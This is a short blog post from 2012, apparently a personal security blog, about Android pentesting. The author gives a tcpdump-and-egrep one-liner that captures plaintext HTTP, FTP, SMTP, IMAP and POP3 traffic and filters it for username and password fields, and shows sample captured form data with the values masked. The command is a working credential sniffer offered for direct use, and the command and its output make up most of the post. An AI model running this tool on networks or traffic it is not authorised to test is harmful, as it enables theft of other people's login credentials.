https://wroot.org/posts/quick-and-dirty-tcpdump-credential-usernamepassword-sniffer/

Quick and dirty tcpdump credential (username/password) sniffer

June 18, 2012 2 Comments

I’ve been playing the last months with mobile pentesting within the Android platform. As I’ve been able to setup tcpdump-arm on my android phone, I began fooling around with it. I was trying to cross-compile Dug Song’s dsniff into armle architechture but it was only giving me headaches within the libnet/libnids dependencies and stuff.
So I wrote a quick one-liner to dump potential credentials (username/password) flowing in plaintext over the line:

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

1	tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

And it works quite sufficiently:

.{D.ezENPOST /users/register HTTP/1.1 Host: www.commandlinefu.com ... Referer: http://www.commandlinefu.com/users/register ... Content-Type: application/x-www-form-urlencoded Content-Length: 147 username=jseidl&password=MASKED&password-confirmation=MASKED&email-address=MASKED%MASKED.MASKEDhomepage=MASKED&submit=Sign+me+up

1 2 3 4 5 6 7 8 9

.{D.ezENPOST /users/register HTTP/1.1 Host: www.commandlinefu.com ... Referer: http://www.commandlinefu.com/users/register ... Content-Type: application/x-www-form-urlencoded Content-Length: 147   username=jseidl&password=MASKED&password-confirmation=MASKED&email-address=MASKED%MASKED.MASKEDhomepage=MASKED&submit=Sign+me+up